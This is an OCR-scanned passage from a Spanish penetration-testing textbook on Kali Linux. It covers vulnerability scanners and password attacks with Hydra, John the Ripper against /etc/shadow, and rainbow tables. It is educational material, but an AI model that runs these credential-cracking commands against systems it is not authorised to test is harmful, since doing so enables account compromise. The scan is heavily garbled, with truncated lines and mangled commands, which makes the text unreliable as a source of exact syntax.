configuración por defecto o sencillamente no establecen ninguna contraseña para acceder al servicio, 
En foros de Internet y a través de correos directos al vendedor se puede encontrar documentación 
sobre credenciales de uso comün o la existencia de cuentas mal configuradas. 


Guías de fortificación / Errores de configuración 

Las guías de fortificación pueden servir de referencia al auditor para comprobar la existencia de 
malas configuraciones o detectar las partes más débiles de un sistema. Además en determinados 
foros puede encontrarse información valiosa sobre puntos críticos y fallos comunes a la hora de 
realizar la configuración del sistema. 
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urar una Réplica de Entorno 

a las tecnologías de virtualización es posible que un investigador de seguridad ejecute una 
variedad de sistemas operativos y aplicaciones, sin la necesidad de recurrir a un hardware 
icado. Cuando se identifica una aplicación o sistema objetivo se puede recurrir al uso de una 
virtual (VM) para recrear el entorno del objetivo. El analista puede utilizar esta máquina 
para explorar parámetros de configuración y el comportamiento de la aplicación, sin necesitar 


configuraciones 

ratorio de pruebas de máquinas virtuales debe poseen un almacén con imágenes de todos 
ias operativos, incluyendo tanto el sistema operativo como cada una de las revisiones (рог 
podría ser Windows XP. XP SP1, ХР SP2, XP SP3, Vista, Vista SP1, 7, etcétera) de cara 

zar el proceso de preparación del entorno de pruebas. Recurrir a la clonación y al uso de la 

ón de instantáneas permitirá trabajar de manera más eficiente y reproducir errores. 


o de fuzzing, o inyección de fallos, es una técnica de fuerza bruta para encontrar defectos en 

ión mediante el procedimiento de probar datos de entrada válidos, aleatorios o inesperados 

aplicación. El proceso básico consiste en adjuntar un depurador a la aplicación de destino 

ntinuación, ejecutar la rutina de fuzzing contra áreas específicas de entrada de datos, para 

analizar el estado del programa después de cualquier fallo que se produzca. Existen múltiples 

ciones para realizar este proceso, sin embargo también resulta común que los investigadores 
nen sus propios fuzzers. 


itificación de posibles vías / vectores 
Ir sesión o conectarse a una aplicación en la red objetivo puede permitir identificar comandos y 
áreas de acceso. Si el destino es una aplicación de escritorio que lee archivos y/o páginas web, 
п analizar los formatos de archivo admitidos para los puntos de entrada de datos. Algunas 
as muy sencillas incluyen el uso de caracteres no válidos o cadenas de caracteres muy largas 
le puedan causar un fallo. En caso de existir, el sn paso consistiría en adjuntar un depurador 
analizar el estado del programa. 


'scompilar y analizar el código 
lenguajes de programación, como los basados en .Ne/, permiten la descompilación y algunas 
асіопеѕ especificas son compiladas con cierta simbología, que permite posteriormente ayudar 
ión. Un investigador debe aprovecharse de estas características para analizar el flujo del 

rama e identificar posibles vulnerabilidades. El código fuente de aplicaciones de código abierto 
debe ser analizado en busca de defectos. Las aplicaciones web escritas en PHP suelen 
tir muchas de las mismas vulnerabilidades, y su código fuente debe ser examinado como 
de cualquier prueba. 
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3. Análisis con Kali 


Muchas de las herramientas disponibles en Kali, (que ya han sido explicadas en el capítulo rel 
à la fase de recogida de información), también detectan al mismo tiempo posibles vulnerabilid 
Debido a que en este libro se dedica un capítulo entero a la fase de auditoría web, donde se a 

las posibles vulnerabilidades de este tipo, se mostrará en esta sección la utilización de herra 

de análisis de vulnerabilidades genéricas. 


Nmap + NSE 


El motor de scripting de Nmap (Nmap Scripting Engine), es una de las características más potent 
y flexibles de Nmap. Permite a los usuarios escribir sencillos scripts para automatizar una а 
variedad de tareas de red. Estos scripts son ejecutados en paralelo con la velocidad y eficienei 
esperada de Nmap. 


El NSE ha sido diseñado para ser versátil, con las siguientes tareas en mente: 


- Descubrimiento de red: Los ejemplo incluyen la búsqueda en whois basado en el dominik 
consultas ARIN, RIPE o APNIC a través de la dirección IP para determinar el dueño, ejec 
búsquedas identd para encontrar puerto abiertos, consultas SNMP, y listado de servicio 5 
directorios disponibles en protocolos como pueden ser NFS o SMB. 

- Detección de versiones más sofisticada: La detección de la versión de un determinadi 
servicio no siempre puede ser llevada a cabo a través del banner del mismo, muchas vec 
resulta necesario realizar otras pruebas independientes, cómo por ejemplo en el caso de Skyp 
v2. Nmap además es capaz de intentar obtener información de los servicios SNMP proband 
por fuerza bruta un listado de más de cien nombres de comunidades. Ninguno de los ejempli 
anteriores puede ser llevado a cabo mediante el funcionamiento normal de Nmap pero sí co 
NSE. 

- Detección de vulnerabilidades: Cuando una nueva vulnerabilidad es descubierta, 
menudo puede ser recomendable escanear sus redes en busca de sistemas vulnerables antes de 
que un posible atacante lo haga. Aunque Nmap no intenta ser un escáner de vulnerabili 

NSE es lo suficientemente potente como para gestionar la comprobación de vulnerabil 

- Detección de puertas traseras: Muchos atacantes y algunos gusanos automáticamen 
dejan puertas traseras para permitir una futura visita. Algunas de estas pueden ser detectad 
mediante- la búsqueda regular de detección de versiones. Mientras que otras requieren € 
desarrollo de un pequeño script con el NSE. 

- Explotación de vulnerabilidades: Como todo lenguaje de scripting, NSE incluso puede 
ser usado para explotar vulnerabilidades además de encontrarlas. La capacidad de añadí 
exploits personalizados puede resultar un añadido para algunas personas (particularmente 
penetration testers), aunque como ya se ha comentado anteriormente el objetivo de Nmap 
ез convertirse en algo similar a Metasploit. 
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de estas características, el equipo de Nmap confía еп la capacidad de inventiva de los 
para que sean capaces de aumentar sus posibilidades. 


ar el motor de NSE con los scripts que posee de serie Nmap es suficiente con añadir el 
” a los argumentos de entrada de la herramienta. 


¡VAS (Open Vulnerabilitiy Assessment System), inicialmente fue denominado GNessUs por ser 
adaptación de la versión de software libre de Nessus. Esto fue hasta el año 2005, justo antes de 
e ser software libre. Se trata de una suite de software, que ofrece un marco de trabajo diseñado 
ar servicio y herramientas especializadas en el escaneo y gestión de vulnerabilidades de 
informáticos. 


actual permite la actualización continua de la base de pruebas de vulnerabilidades de red, 
na de estas pruebas se las conoce como NVT por sus siglas en inglés), y actualmente posee 


le 30000 NVT. 


ве ha automatizado gran parte del proceso de configuración y preparación del servicio 

$. Sin embargo aún resulta necesario seguir una serie de pasos: 

- Ejecutar openvas-setup: Este comando se encarga de realizar la configuración inicial, 
argar la base de datos de los МУТ y crear la cuenta del usuario. 

“Ejecutar openvas-gsd: Este comando permite acceder al panel de control gráfico de 

penVAS. Tras realizar este acceso, hay que introducir los campos relativos а la IP de 

vidor (localhost), usuario y contraseña. Al introducir la IP, generalmente, aparecerá una 

'roja indicando problemas de conexión, pero tras un breve periodo de tiempo, si todo se 

desarrollado correctamente aparecerá una “?”. 

Acceder al gestor web: Desde el panel de control, y de manera directa, es posible acceder 

panel de administración y consulta de los informes más amigable. Sin embargo en la 

бп actual de Kali dicho acceso no parece funcionar correctamente y, pese a tratarse de 

acceso en local, la carga se realiza de manera muy lenta. 


el panel de administración hay que defifiir el objetivo a auditar, el rango de puertos y la 
d de las pruebas, en lo que se considera una nueva tarea. Posteriormente seleccionando 
ea se escoge la opción iniciar y sólo restaría esperar a la finalización del escáner y 
resultados. 


le un escáner de vulnerabilidades similar a OpenVAS, en parte a que comparten el mismo 
carácter propietario, desarrollado por Tenable Nenwork Security. Gratuito para uso 
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personal y entornos no corporativos. Su objetivo es detectar vulnerabilidades potenciales en | 
sistemas a auditar. 1 


Nessus no viene de serie en Kali, sin embargo debido a que tiene una interfaz mucho más potei 
à que es el escáner de preferencia de muchos auditores de seguridad y a que OpenVAS tambi 
necesita unos pasos previos para ser utilizado, se ha considerado oportuno explicar su proceso 
instalación en Kali así como diversos aspectos interesantes, que son la preparación del perfil mi 
“agresivo” y la integración de Nikto en la herramienta. 


El procedimiento a seguir para instalar y pasar a utilizar Nessus en Kali sería el siguiente: 
* Descargar la versión adecuada de Nessus para Debian 6.0 
* Desempaquetar el paquete Debian. Para ello se escriben los siguientes comandos en consola; 
- cd /tmp/ 
- ак vx Nessus-5.0.3-debianó* 
-  tar=xzvfdata.targz 
- ar-xzvf control.tar.gz 
Esto generará las carpetas "etc" y "opt". 
* Copiar las carpetas localizadas en /tmp/opt, al directorio /opt, (si no existe dicho directorio 
habría que crearlo). A continuación se escribirían en consola los siguientes comandos: 
- mkdir /opt 
- cp-Rf/mp/opt/nessus /opt 
- cp-Rf/tmp/etc/init.d/nessus* /etc/initd 
A partir de este momento ya se podrán eliminar los archivos que queden en la carpeta /tmp. 
+ Arrancar Nessus desde un terminal, y escribir en consola el siguiente comando: 
-  /etclinit.d/nessusd start 


* Abrir Iceweasel y navegar a la dirección https:/127.0.0.1:8834. La primera vez que se - 
acceda a Nessus será necesario conseguir una licencia de uso gratuito. 


Nessus Perfil Agresivo 


Al igual que el resto de escáneres de vulnerabilidades hay ciertas opciones deshabilitadas en todos 
los perfiles por su agresividad o por tratarse de características experimentales. En base a ello hay una 
serie de características a considerar si se desea evaluar la efectividad de los distintos escáneres, Si el 
entorno a evaluar no es de producción podría ser recomendable revisar las siguientes características; 


- Сотргођасіопеѕ seguras: Nessus hace lo posible para no causar efectos adversos en 
los sistemas y/o red auditada. Por ello, la opción de comprobaciones seguras se encuentra 
habilitada en todas las políticas de escaneo que vienen por defecto. Las comprobaciones 
seguras cambian el comportamiento de cientos o más plugins. 
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Pruebas exhaustivas (lento): Causa que varios plugins actúen más agresivos y penetren 
profundamente en el sistema para detectar la vulnerabilidad y expandir el objetivo de 

Ла búsqueda para la citada vulnerabilidad. Por ejemplo, cuando busca archivos compartidos 

mediante SMB, el plugin analizará tres niveles de profundidad en lugar de uno solo. 

Scripts experimentales: Esta opción habilita los plugins experimentales, con ello ciertos 
ins además ganarán alguna funcionalidad adicional. 

Seguir enlaces dinámicos: Le indica a Nessus que utilice el Spider en cada sitio web 

que encuentre, añadiendo las entradas a la base de conocimiento para que otros plugins 
:ncuentren vulnerabilidades en dichos sitios. 

- Informe Paranoia: Esta opción hará que el informe muestre mucha más información 

aunque con la consecuencia directa de un incremento de falsos positivos. 

Probar servicios basados en SSL: Cuando se configura para “Todos”, cada servicio será 

probado para buscar capacidades SSL. 
- Credenciales: Añade la posibilidad de usar credenciales de manera que sea posible realizar 

ciertas comprobaciones para aumentar la certeza de las vulnerabilidades descubiertas. 


se a lo anteriormente comentado, Paul Asadoorian, un trabajador del equipo de Tenable en 
de pauldotcom.com analiza estos parámetros y permite la descarga de un perfil con estos 
os ya ajustados. 


+ Nikto 
de Tenable en un artículo del año 2010 comenta el procedimiento a seguir para integrar 

о а modo de plugin en Nessus. El procedimiento completo a seguir sería el siguiente: 

* Descargar Nikto e instalarlo, para ello ejecutar los siguientes comandos: 

- wget http:/cirt.net/nikto/nikto-2.3.8.tar.gz (escoger la última versión existente) 

- tar zxvf nikto-2.#.#.tar gz 

Ejecutar los siguientes comandos como root: 

- mkdir /opt/nikto 

- cp-r*/opt/nikto 

Modificar /opt/nikto/nikto.pl y cambiar la localización del archivo de configuración 

- $NIKTO('configfile') = "/opt/nikto/nikto.conf"'; 

Añadir la siguiente línea a /erc/profile y actualizar el PATH del sistema para que incluya nikto 

- export PATH-$PATH: /opt/nikto:/opt/nessus/bin:/opt/nessus/sbin 

Recompilar y reindexar los plugins de Nessus: 

- Jopt/nessus/sbin/nessud -R 

Finalmente reiniciar Nessus: 

- /eic/init.d/nessusd restart 
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Escáner activo de Burp Suite 

Esta herramienta será comentada en profundidad en el capítulo de análisis de vulnerabilidad 
web. Sin embargo, es preciso comentar, al igual que se hizo con Nikto, la potencia que ой 
combinación generada por las utilidades de Spider y el escáner activo de Burp Suite. M 
que Nikto posee una serie de plugins que prueban la existencia de determinados elemento 
determinadas direcciones URL, Burp Suite es capaz de recorrer todos los enlaces de un determina 
sitio web realizando una inmensa batería de pruebas capaz de detectar todo tipo de vulnerabili d 
web o de malas configuraciones. Obviamente ñinguna herramienta es capaz de detectar por si 
vulnerabilidades asociadas con la lógica de negocio de las aplicaciones, y generar un informe mi 
detallado sobre el tipo de vulnerabilidad encontrada, información sobre la misma y resalta 
punto exacto de inyección. 


Yersinia 

Yersinia es una herramienta de red diseñada para tomar ventaja de determinadas vulnerabilidad 
en diferentes protocolos de red. Pretende ser un marco sólido para analizar y probar las red 
sistemas. d 


Actualmente se encuentran implementados ciertos protocolos de red, aunque el autor d 
herramienta afirma que la compatibilidad con otros se encuentra en camino y, al mismo tiem 
anima al desarrollo de más módulos por parte de la comunidad. Los protocolos actual 
soportados son los siguientes: 

- Spanning Tree Protocol (STP). 

- Cisco Discovery Protocol (CDP). 

- Dynamic Trunking Protocol (DTP). 

- Dynamic Host Configuration Protocol (DHCP). 

- Hot Standby Router Protocol (HSRP). 

- IEEE 802.1Q 

- IEEE 802.1X 

- nter-Switch Link Protocol (ISL). 

- Vlan Trunking Protocol (VTP). 


Spike 

Para acabar la sección de herramientas incluidas en Kali para el análisis de vulnerabilidad, ht 
que hacer mención a una serie de herramientas de fuzzing incluidas en Spike. Spike es una 
basada en GPL y un conjunto de herramientas que permite crear rápidamente las llamadas “р 

de estrés” sobre un determinado protocolo. Dichas pruebas consisten en lanzar muchas peticio né 
especiales a un protocolo, a la espera de que este genere un comportamiento anómalo, que pueda st 
posteriormente estudiado y explotado. 
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mejor el funcionamiento de la herramienta y ver como se realizan pruebas 
as de estrés sobre los protocolos, resulta recomendable ver la presentación que se hizo 
nto acerca de la herramienta, datada en el año 2002: http:/Avww.immunitysec.com/ 
-papers.shtml. 


aques a contraseíias en Kali Linux 


e contraseñas se remonta a la antigüedad, cuando un sitio era protegido, y alguien intentaba 
Га él se le solicitaba el «santo y seña». Solamente la persona que conocía la contraseña era 
ía pasar. En la actualidad, las contraseñas son utilizadas рог lo general para controlar 
а sistemas, equipos, teléfonos móviles, instalaciones, cajeros automáticos, etcétera. A 
dispositivos puede hacer uso de contraseñas para diferentes propósitos, incluyendo 
ones a cuentas de usuario, correo electrónico, bases de datos, redes, aplicaciones, etc. Es el 
le autenticación y protección más utilizado en la actualidad para casi todo, lo que lo hace uno 
cipales objetivos a atacar cuando se quiere tener acceso a algo. 


les a contraseñas o password cracking no son más que todas aquellas técnicas orientadas 


0 descifrar contraseñas utilizadas para proteger sistemas, aplicaciones o documentos. Es 
tener en cuenta que todo mecanismo de autenticación por contraseñas lo que realiza es 
¡ón del hash de las contraseñas establecidas para protegerlos, con el generado por la 

introducida. 

una cadena de longitud fija de valores alfanuméricos, y en algunos casos se usan caracteres 
como *.", “/” o “Y” que se suele obtener al aplicar una función hash a un texto plano. La 
a de un hash es que sirva como una representación compacta de la cadena de entrada, es 
e también es conocida como “función resumen”. Dicha “función resumen” también es 
para proteger las contraseñas almacenadas en sistemas que requieren autenticación. 


Imagen 03.05: Almacenamiento de hash en sistemas GNU/LINUX. 
anterior muestra como son almacenadas las contraseñas en un sistema GNU/Linux. Cada 


los usuarios, sus contraseñas protegidas y las diferentes políticas que se aplican 
8 contraseñas de dicho usuario. El contenido de cada una de las líneas es el siguiente: 


itmo de resumen utilizado. 
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3. El salt de la contraseña. 


4. La contraseña cifrada. Este es el hash de la contraseña almacenado y el que se utiliza 
comparar y poder autenticar al usuario. 


5. Los días trascurridos desde el 1 de enero 1970 hasta el día en que la contraseña fue ca 
por última vez. 


6. El número mínimo de días requerido para poder cambiar la contraseña. 


7. El número máximo de días que la contraseña es válida. Una vez transcurridos dichos di 
usuario se verá obligado a cambiar la contraseña. 


8. El número de días antes de que expire la contraseña, durante los cuales el usuario es advertit 
de que debe ser cambiada. 


9. El número de días que debe trascurrir después de que caduque la contraseña para qui 
cuenta sea deshabilitada. 


10. El número de días desde el 1 de enero de 1970 en que la cuenta estará deshabilitada o h i 
expirado. 


Por lo general en todos los sistemas conocidos estos datos son almacenados de una manera simil 
Dentro de los hash más conocidos se encuentran: 


* М05: Comúnmente utilizado en algunos sistemas UNIX y GNU/Linux más antiguos que 
actuales, también se sigue utilizando en algunos foros y CMS como WordPress, o Joomli 
hash es representado típicamente como un conjunto de 32 dígitos hexadecimal, La debi 
este hash, (como en todos los algoritmos de resumen), son las colisiones. Una colisión de 
es una situación donde dos entradas distintas a una función de hash producen una misma salid 
Esto se debe a que el nümero potencial de posibles entradas es mayor que el nümero de salid 
que puede producir un hash. : 


El hecho de que en estas funciones de resumen se puedan introducir datos de longitud arbi 
a partir de ellos se genere un hash de tamaño fijo, es lo que permite que siempre exista el rit 
de colisiones, debido a que un hash dado puede pertenecer a un infinito nümero de entradas. Р‹ 
esta razón es posible que dos palabras distintas generen un mismo MD5. 


La probabilidad de colisión se verá afectada por la efectividad del algoritmo de reducción, es dec 
las colisiones se producen más frecuentemente en algoritmos mal diseñados. Hay variaciones 
МР5 que implementan en su algoritmo de resumen la incorporación de una variable denomi 

salt, que no es más que un conjunto de bits aleatorios, con el fin de reducir las posibilidades 
colisiones e incluso aumentando la fortaleza del hash haciéndolo más dificil de descifrar. 


+ SHA: Estos hashes son también usados en muchos CMS, foros y versiones actuales d 
sistemas UNIX y GNU/Linux. Es un sistema de funciones hash de la Agencia de Segurida 
Nacional de los Estados Unidos. Nació como SHA cerca del año 1993, pero en la actualidad 
una familia amplia, donde se encuentran el SHA-1 y el SHA-2, siendo este último el que agru] 
SHA-224, SHA-256, SHA-384, y SHA-512. El SHA-1 es representado como un conjunto de 32 
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tos hexadecimal, mientras que los demás son representados como un conjunto de 56, 64, 96 
8 digitos hexadecimales respectivamente, haciendo esto cada vez más dificil las colisiones. 


LM: Es el primer hash de los sistemas Windows utilizado para representar las contraseñas en 
fichero y fue introducido en versiones previas a Windows NT. Este algoritmo de cifrado hoy 
día está considerado obsoleto y no seguro, solamente es utilizado por temas de compatibilidad 
n sistemas operativos antiguos. La debilidad de este hash se centra en 3 características, que 


- El máximo tamaño de las contraseñas es de 14 caracteres, y para hacer el proceso de hash, 
- este se divide en dos bloques de 7 caracteres cada uno. 

No existe diferencia alguna entre mayúsculas y minúsculas ya que en el proceso de 
cifrado la contraseña es transformada completamente a mayúsculas. 

=- Lasimplicidad del algoritmo permite generar con un equipo sin muchas prestaciones más 
de 10 millones de hash por segundo. 


^ NTLM: Es el sucesor de LM, proporciona mayor robustez y seguridad que el hash LM, El 
eso de ataque a este tipo de hash conlleva un aumento exponencial de tiempo, sobre todo 
utilizan más de 8 caracteres, mezclando mayúsculas, minúsculas, números y caracteres 
'iales. 


dos de ataque 
ro de las técnicas de ataques a contraseñas se encuentran: 


Ataques de fuerza bruta: esta técnica consiste en probar todas las combinaciones posibles 
sta encontrar aquella que permite el acceso, usando distintos patrones (números, caracteres, 
sculas y minúsculas, entre otros) y siendo el único limitante el largo establecido de la 
aseña. 

Ataques de diccionario: son muy similares a los “ataques de fuerza bruta”. La diferencia 
тайса еп que las combinaciones suelen ser palabras de un diccionario, determinados por un 
je y dialecto en particular. Suelen ser más rápidos que los “ataques de fuerza bruta” 
por contener menos combinaciones con que comparar, у con pocas probabilidades de éxito 
соп sistemas que emplean contraseñas fuertes con caracteres alfanuméricos, mayúsculas, 
minúsculas y cualquier otro tipo de símbolo. , 

| ~ Ataques de Rainbow Table: son ataques basados en una tabla que almacena una relación de 
s de palabras en texto plano (palabra inicial — palabra final). La relación que vincula estas 
bras es que ambas son utilizadas еп la función de resumen y reducción que representa 
a Rainbow Table. El proceso que se realiza para la creación de una de estas tablas es el 
guiente: Sobre la palabra inicial se aplica un algoritmo de resumen y se obtiene el hash de 
- dicha palabra. Luego dicho hash se le aplica un algoritmo de reducción, que genera como 
_ resultado una nueva palabra en texto plano. Cabe destacar que el algoritmo de reducción no 
está revertiendo el hash, la palabra obtenida no tiene que ver con el hash anterior, mientras 
e con el algoritmo de resumen que se aplica a la palabra inicial sí que da como resultado 
el hash de dicha palabra. 
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Imagen 03.06: Proceso de creación de una Rainbow Table. 


Este proceso de resumen y reducción, suele repetirse alrededor de unas 40.000 veces р 
cada línea que se almacena durante el proceso de creación de una Rainbow Table. La ültin 
palabra obtenida después de realizar todo el proceso es la palabra final que se айтас 
junto con la palabra inicial que inicio eJ proceso. Para descifrar un hash con Rainbow Ta 
se realiza el mismo proceso las susodichas 40000 veces, comparando en cada una de ell 
el resultado del algoritmo de reducción con la palabra final almacenada en cada línea. 
ho se consigue coincidencia alguna después de repetir el proceso significa que ese ha 
no está contemplado por esa Rainbow Table. En caso contrario, si se encontrara algul 
coincidencia en dicho proceso, se toma la línea, y se realiza de nuevo la reducción y: 
resumen mencionados, tomando esta vez como punto de partida la palabra inicial de la lín 
hasta así encontrar la palabra que genera el hash que se está buscando. 


Tipos de ataque 


En Kali Linux existen muchas herramientas de ataques a contraseñas. Están subdivididas 
módulos dentro de los cuales están: 


Ataques con conexión 


En este tipo de ataque es necesario que el dispositivo o servicio se encuentre en línea, para de е 
forma poder establecer una comunicación con el mismo, en la que se intentan averiguar credenci el 
válidas estudiando el tipo de respuestas obtenidas por cada una de las peticiones que se le realiza 

Todas las herramientas de este tipo de ataque se pueden encontrar en la pestaña de Aplicacione 
>Kali Linux->Ataques de contraseñas->Ataques con conexión. 


Una herramienta muy conocida y utilizada es Findmyhash. Es un script desarrollado en Python qu 
permite buscar hashes de contraseñas en diferentes servicios web gratuitos para tratar de romperlos 
Este proceso consiste en consultar distintos repositorios en Internet que almacenan hashes 

estudiados, para buscar coincidencias con la búsqueda que se realiza. Suele ser una manera m 
fácil y efectiva de estudiar un hash, aumentando la probabilidad de conseguir un resultado po 
su diversidad en la búsqueda, y que suele ser una ventaja frente a las herramientas de ataque а 
contraseñas sin conexión. También puede llegar a ser más rápida, ya que en la mayoría de casos sol 
ве basa en la comparación de lo que se busca, y un hash ya estudiado y almacenado en repositorio 
online no requiere de ningún cálculo o proceso de cómputo. Esta herramienta estudia hashes MD 

MDS5, SHA1, SHA224, SHA256, SHA384, SHA512, RMD160, GOST, WHIRLPOOL, LM, NTLM, 
MySQL, CISCO7, JUNIPER, LDAP_MD5, LDAP SHAI. 


Se puede usar esta herramienta accediendo directamente en la terminal usando el comando 
"Findmyhash" o a través de la pestaña de “Aplicaciones”. De cualquiera de los 2 modos se obtend 
en la terminal toda la información de la herramienta. El comando se estructura de la siguiente manera) 
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Cisco enable, CVS, Firebird, FTP, НТТР, LDAP, MS-SQL, MySQL, Oracle, RDP. SMB, $ 
SNMP, SSH , Svn, Telnet, VMware-Auth, VNC , etcétera. 


La herramienta viene en dos versiones, una para ser utilizada desde la terminal y otra. que 
interfaz visual donde se rellenan los datos necesarios para realizar el ataque. Elementos i 
à tener en cuenta cuando se realiza un ataque con esta herramienta son: 


- Datos del objetivo como dirección o lista de direcciones que se quieren analizar, el 
y el protocolo a atacar. 


- Datos de usuarios y contraseñas que se quieren probar, lo más común es el; 
diccionario en un documento de texto y especificar las credenciales a probar. Se puede 
un solo diccionario y utilizarse tanto para usuarios como para contrasefias. 


Imagen 03.09: Diccionario en documento de texto. 


Un escenario para demostrar la configuración y el funcionamiento de la herramienta puede 
siguiente: Se tiene un objetivo (en el caso de esta prueba será el propio localhost). en el cual se 
la certeza de que se está ejecutando un servicio de SSH y se desean obtener las credenciales 
poder conectarse a él. Al abrirse la herramienta Hydra-grk se observa la siguiente interfaz. 


тоого sonar P [root/Desktop/áecionario -e 
Imagen 03.10: Interfaz visual de Hydra. 
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era pestaña se configura todo lo relacionado con el objetivo a atacar. En la imagen anterior 
apreciar que se ha colocado la dirección a atacar, el protocolo y la puerta de enlace. 


n se observa que debajo hay otras opciones a marcar, como por ejemplo si se desea usar 
visualizar todos los intentos, mostrar una explicación detallada de todo el proceso de ataque 
es y aciertos), o si se desea ver cada una de las acciones que realice la herramienta, En el caso 
ie no se seleccionen ninguna de dichas opciones, solo mostrará los resultados positivos en caso 


| segunda pestaña aparece todo lo relacionado con las credenciales. En dicha pestaña se 
can los usuarios y las contraseñas que se desean probar en cada uno de los apartados. La 
п de dichos usuarios y contraseñas puede hacerse de manera manual en la primera opción 
apartado, o especificando un documento de texto que contenga un diccionario de palabras 
se realizará la prueba. Además debajo se encuentran dos opciones importantes a tener 
que consisten en poder probar el mismo nombre de usuario como contraseña y el probar 
seña vacía. 
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га (http.//www.thc.org/thc-hydra) finished at 2013-04-16 11:44:34 


p 
Bac 
25 


| 


Imagen 03.12: Resultado del estudio con Hydra. 


Otra herramienta muy utilizada para “ataques de diccionario” es Medusa. Es gestionable solo 
través de la terminal y lo fundamental para su manejo (al igual que con Hydra), es conocer los dat 
del objetivo (dirección, protocolo y puerto) y los datos de las credenciales (diccionario con todos 
combinaciones a utilizar). 


Ataques sin conexión 

En este tipo de ataques, resulta necesario establecer contacto con el dispositivo o servici 
(generalmente una única ocasión), en la que se establece una comunicación cifrada o se consi, 
un hash que puede ser almacenado de manera local para posteriormente ser estudiado. En este ti; 
de ataques, todo el proceso es realizado de manera local. Una vez que se obtiene el hash a estudi 
pueden utilizarse una gran cantidad de herramientas que ofrece Kali Linux, concretamente 
este tipo de ataques se pueden encontrar las herramientas en la pestaña Aplicaciones->Kali Lim 
>Ataques de contraseñas->Ataques sin conexión. 


Una herramienta muy útil a la hora de identificar un hash sin saber qué tipo de hash se posee 
hash-identifier. Solo se le debe especificar el hash obtenido, la herramienta lo estudia y muestra el 
tipo de hash que podría ser, Para demostrar el funcionamiento de esta herramienta se toma un А 
SHAS12. Si esta se ejecuta desde la pestaña de aplicaciones se abrirá una terminal, solicitando 
hash que se desea estudiar. Como se puede observar en la siguiente imagen una vez especifica 
dicho hash, la herramienta se encarga de identificar y sugerir los posibles tipos de hash que рш 
ser, dividiéndolos en 2 tipos: Tipos de hash probables y tipos de hash menos probables. 
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HASH: ca6fd193620872 f8b49345649019fb181790064249ad415100784714c70c2e8d4acdda; 


5a1721c4f237533091 f6b1818194f6505803080907c42c71a1703 


Imagen 03.13: hash-identifier. 


ser una herramienta útil si no se tiene la certeza de qué tipo de hash se obtuvo, para así 
шпа idea de qué estudio se debe realizar y qué herramienta utilizar en base al tipo de hash 


identificado el hash se puede utilizar una aplicación muy popular en el mundo de ataques a 
señas como es Johntheripper. Esta herramienta utiliza tanto “ataques de fuerza bruta” como de 
о. Se le puede especificar un diccionario de palabras con contraseñas tipicas que se pueden 
iren Internet. También prueba con variaciones de estas palabras añadiendo números, signos, 

y minüsculas, intercambia letras, combina palabras, etcétera. Además de que ofrece el 
de fuerza bruta en el que se prueban todas las combinaciones posibles, sean palabras 


acceder a la herramienta utilizando el comando "john" en la terminal, o a través de la 


ciones. Esta herramienta es capaz de identificar el hash que se introduce, pero también 
zarse a resolver solo un tipo de hash con el comando: “john --source- [tipo de hash] " 


пе los hashes a estudiar. En esta ocasión se estudiará el fichero “/etc/shadow” que 
las contraseñas de los usuarios en cualquier sistema GNU/Linux. Para ello hay que tener 
que Johntheripper tiene 4 modos de ataques a contrasefias. A continuación se muestran 
nodos con su comando de consulta correspondiente 


"Single crack": Este modo prueba contrasefias similares al usuario. El comando para este 
de consulta sería el siguiente: “john —single [fichero a estudiar] " 


тоокфкаш = 
Editar Ver Buscar Termmal Ayuda 
11:-# john --single /atc/shadow 


d 4 password hashes with 4 different salts (generic crypt(3) [?/32]) 
(Javi) 


5 100% с/з: 40.58 trying: 999991916 - 999991908 


: Johntheripper modo single crack. 
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- “wordlist”: Este modo utiliza ataque por diccionarios, por defecto trae un diccion: 
muy básico pero puede especificarse un diccionario que pueda descargarse o crearse. 
comando es: “john --wordlist- [fichero con el diccionario] [fichero a estudiar] " 


root@kali: ~ 
Archivo Editar Ver Buscar Terminal Ayuda 


rootgkali:-8 john --wordlist=Desktop/diccionario /etc/shadow 
Loaded 4 password hashes with 4 different salts (generic crypt(3) [?/32]) 


Remaining 3 password hashes with 3 différent salts 

Pesswerd! pepe) 

guesses: 1 time: 8100:080:00 100% c/s: 38.78 trying: root - calabaza 
Use the "--show" option to display all of the cracked passwords reliably 
Irootékali:-& 


Imagen 03.15: Johntheripper modo wordlist. 


- Modo "Incremental": Este modo emplea ataque por fuerza bruta, probando con todas 
posibilidades existentes. El comando es: “john incremental [fichero a estudiar] " 
- Modo “External”: En este modo se puede definir un código propio para generar 
contraseñas de prueba. Pueden establecerse las reglas para crear las entradas a comparar: 
pueden establecerse incluso filtros para controlar las entradas generadas. 


Introduciendo en la terminal el comando “john fruta del fichero que contiene los hashes]" 
aplican los 3 primeros modos uno detrás del otro, primero usa el modo "single crack", luego 
modo “incremental” y por último el modo “wordlist”. Si el fichero es de configuración y alm: 
una relación usuario-password, (como es este caso), genera una salida del mismo tipo (usi 
password). Si es un fichero que contiene solo hashes, la salida es solo el texto plano que genera 
hash. 


Otra aplicación útil es rígen, que permite generar tablas de rainbow con el fin de mejorar 
rendimiento en un proceso de crackeo. La aplicación devolverá uno o varios ficheros de tipo rt 
almacenarán en su interior la tabla de los hashes precalculados. 


La aplicación rainbowcrack se encuentra en la ruta /usr/share/rainbowcrack. En esta ruta 
encuentran archivos como charset.txt el cual define los diferentes charsets que se pueden utilizar: 
la librería a/glib0.so con la que se definen los algoritmos para el soporte de los hashes. 


Los parámetros que se disponen en rígen son los siguientes: 


Parámetro Descripción 
Hash_algorithm Algoritmos disponibles en rigen (MD5, SHA1 „LM, NTLM, etcétera). 
Charset Conjunto de caracteres que se utilizarán para realizar las combinaciones en 
la tabla. 


Plaintext_len_min | Longitud mínima de las palabras que serán hasheadas. 
Plaintext_len_max | Longitud máxima de las palabras que serán hasheadas. 
Table_index Índice de la función de reducción que se utiliza en las tablas de rainbow. 
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Descripción 
Longitud de las cadenas dentro de la tabla de rainbow. El mínimo es 16 
bytes 


Número de cadenas en la tabla. Importante un número alto para cubrir con 
más probabilidad el charset 


| Punto de entrada рага cada proceso de crackeo y puede ser aleatorio 


ión risort permite que el procesamiento de la tabla y la búsqueda en ésta sean más sencillos. 
esto que se debe utilizar la aplicación una vez generada la tabla con el fin de optimizar los 
que se realicen con la tabla de rainbow. 


ls 
8 

0123456789 

38 31 32 33 34 35 36 37 38 39 


ng... 

of 100009 rainbow chains generated (0 m 4.9 s) 
6 of 100000 rainbow chains generated 5 

Б of 100000 rainbow chains gone! 

00008 о? 100000 


Tting rainbow table by end point... 
riting sorted rainbow table... 


Generación de una tabla de rainbow para el algoritmo LM con 5 dígitos de longitud. 


nta rcrack permite utilizar las tablas de rainbow generadas anteriormente, o incluso 
